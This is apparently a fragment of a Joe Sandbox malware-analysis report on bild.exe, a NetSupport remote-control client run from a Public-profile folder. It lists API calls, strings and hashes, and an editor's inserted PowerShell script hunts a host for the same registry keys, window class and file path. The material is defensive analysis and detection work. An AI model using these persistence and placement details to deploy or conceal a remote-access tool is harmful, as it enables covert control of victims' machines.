                                                                                      • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                      • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                      • API String ID: 3360349984-1136101629
                                                                                      • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                      • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                      • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                      • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s%s%s.bin$405464$_HF$_HW$_SW
                                                                                      • API String ID: 2111968516-2617670440
                                                                                      • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                      • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                      • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                      • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                      • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                      • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                      • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                      • String ID: NSMDesktopWnd
                                                                                      • API String ID: 2669163067-206650970
                                                                                      • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                      • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                      • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                      • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                      APIs
                                                                                      • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                      • KillTimer.USER32(00000000,00007F58,TermUI...), ref: 1113CCB3
                                                                                      • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeKillLibraryTimer
                                                                                      • String ID: TermUI
                                                                                      • API String ID: 2006562601-4085834059
                                                                                      • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                      • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                      • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                      • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                      • API String ID: 47109696-3245241687
                                                                                      • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                      • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                      • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                      • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                      APIs
                                                                                        • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                        • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                        • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                      • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                      • API String ID: 806825551-1858614750
                                                                                      • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                      • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
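The function blocks above expose host artifacts that survive outside the sandbox: the two PCICTL registry keys opened under HKEY_LOCAL_MACHINE (RegOpenKeyExA's first argument 0x80000002), the NSMDesktopWnd window class registered through GlobalAddAtomA / RegisterClassA / CreateWindowExA, and the per-machine key name formed from "\Registry\Machine\SOFTWARE\Classes\N%x"; the next function block adds the sample's on-disk path as returned by GetModuleFileNameA. The following PowerShell hunt is an added example and is not code from the Joe Sandbox report or from NetSupport. The function names (Invoke-NetSupportHunt, Find-NetSupportWindows, New-Hit), the treatment of "%x" as a hex string of at least four digits, and the "anything running from C:\Users\Public" heuristic are the editor's assumptions, not facts shown by the report.

```powershell
# Added example, not code from the Joe Sandbox report or from NetSupport:
# hunt a live Windows host for the artifacts the function blocks above expose.
# Requires PowerShell 5.1+ in an elevated session (HKLM reads, other users'
# processes). It only reports; it changes nothing.

# RegOpenKeyExA's first argument 0x80000002 is HKEY_LOCAL_MACHINE, so both
# PCICTL keys live under HKLM. ForceRTL is the value name seen beside them.
$PcictlKeys = @(
    'HKLM:\SOFTWARE\NetSupport Ltd\PCICTL',
    'HKLM:\SOFTWARE\Productive Computer Insight\PCICTL'
)
# Path GetModuleFileNameA returned for the running sample.
$KnownSamplePath = 'C:\Users\Public\Public\Videos\Video\bild.exe'
# Window class passed to GlobalAddAtomA / RegisterClassA / CreateWindowExA.
$WindowClass = 'NSMDesktopWnd'
# Key name built from "\Registry\Machine\SOFTWARE\Classes\N%x": "N" plus a hex
# value. Assumption (the report shows no formula): %x is the volume serial from
# GetVolumeInformationA. Either hex case is accepted; matches are leads only.
$ClassesPattern = '^N[0-9A-Fa-f]{4,}(\.[^\\]+)?$'

# user32 imports for walking top-level windows and reading their class names.
Add-Type -Namespace NsHunt -Name User32 -MemberDefinition @'
public delegate bool EnumWindowsProc(System.IntPtr hWnd, System.IntPtr lParam);
[DllImport("user32.dll")] public static extern bool EnumWindows(EnumWindowsProc cb, System.IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Unicode)] public static extern int GetClassName(System.IntPtr hWnd, System.Text.StringBuilder sb, int nMaxCount);
[DllImport("user32.dll")] public static extern uint GetWindowThreadProcessId(System.IntPtr hWnd, out uint pid);
'@

function New-Hit([string]$Kind, [string]$Value, [string]$Detail) {
    [pscustomobject]@{ Indicator = $Kind; Value = $Value; Detail = $Detail }
}

function Find-NetSupportWindows {
    # Only top-level windows on the calling desktop are visible to EnumWindows.
    $hits = New-Object System.Collections.Generic.List[object]
    $callback = [NsHunt.User32+EnumWindowsProc]({
        param([IntPtr]$hWnd, [IntPtr]$lParam)
        $sb = New-Object System.Text.StringBuilder 256
        [void][NsHunt.User32]::GetClassName($hWnd, $sb, $sb.Capacity)
        if ($sb.ToString() -eq $WindowClass) {
            $ownerPid = [uint32]0
            [void][NsHunt.User32]::GetWindowThreadProcessId($hWnd, [ref]$ownerPid)
            $owner = Get-Process -Id $ownerPid -ErrorAction SilentlyContinue
            $hits.Add((New-Hit 'WindowClass' $WindowClass "hwnd=0x$($hWnd.ToString('X')) pid=$ownerPid image=$($owner.Path)"))
        }
        return $true   # keep enumerating
    }.GetNewClosure())
    [void][NsHunt.User32]::EnumWindows($callback, [IntPtr]::Zero)
    return $hits
}

function Invoke-NetSupportHunt {
    $results = New-Object System.Collections.Generic.List[object]

    foreach ($key in $PcictlKeys) {
        if (Test-Path -LiteralPath $key) {
            $values = (Get-Item -LiteralPath $key).GetValueNames() -join ','
            $results.Add((New-Hit 'RegistryKey' $key "values=[$values]"))
        }
    }

    if (Test-Path -LiteralPath $KnownSamplePath) {
        $hash = (Get-FileHash -LiteralPath $KnownSamplePath -Algorithm SHA256).Hash
        $results.Add((New-Hit 'File' $KnownSamplePath "sha256=$hash"))
    }

    # Heuristic (editor's, not from the report): any image running out of
    # C:\Users\Public deserves a look; the sample's own path is one instance.
    Get-Process -ErrorAction SilentlyContinue |
        Where-Object { $_.Path -and $_.Path -like 'C:\Users\Public\*' } |
        ForEach-Object { $results.Add((New-Hit 'Process' $_.Path "pid=$($_.Id) name=$($_.ProcessName)")) }

    Get-ChildItem -LiteralPath 'HKLM:\SOFTWARE\Classes' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match $ClassesPattern } |
        ForEach-Object { $results.Add((New-Hit 'ClassesKey' $_.Name 'matches the N%x shape; verify before acting')) }

    foreach ($w in Find-NetSupportWindows) { $results.Add($w) }
    return $results
}

Invoke-NetSupportHunt | Format-Table -AutoSize
```

Two caveats apply when reading the output. NetSupport Manager is commercial remote-control software, so the PCICTL keys and the NSMDesktopWnd class also exist on legitimate installs; a hit establishes that a NetSupport client is present, and the call turns on where it runs from (a Public-profile subfolder rather than Program Files), how it persists, and where it connects. EnumWindows also cannot see windows created on another window station or desktop, so a client started as a service will show up through the registry and process checks but not through the window-class check.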
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                      • ResetEvent.KERNEL32(00000260), ref: 11144269
                                                                                      • SetEvent.KERNEL32(00000260), ref: 1114427F
                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                      • String ID: MiniDump
                                                                                      • API String ID: 1494854734-2840755058
                                                                                      • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                      • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                      • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                      • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                      APIs
                                                                                      • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                      • wsprintfA.USER32 ref: 11146E06
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                      • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                      • API String ID: 1985783259-2296142801
                                                                                      • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                      • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                      • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                      • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • _memset.LIBCMT ref: 1110F477
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                      • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                      • API String ID: 3234921582-2664294811
                                                                                      • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                      • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                      • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                      • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                      APIs
                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
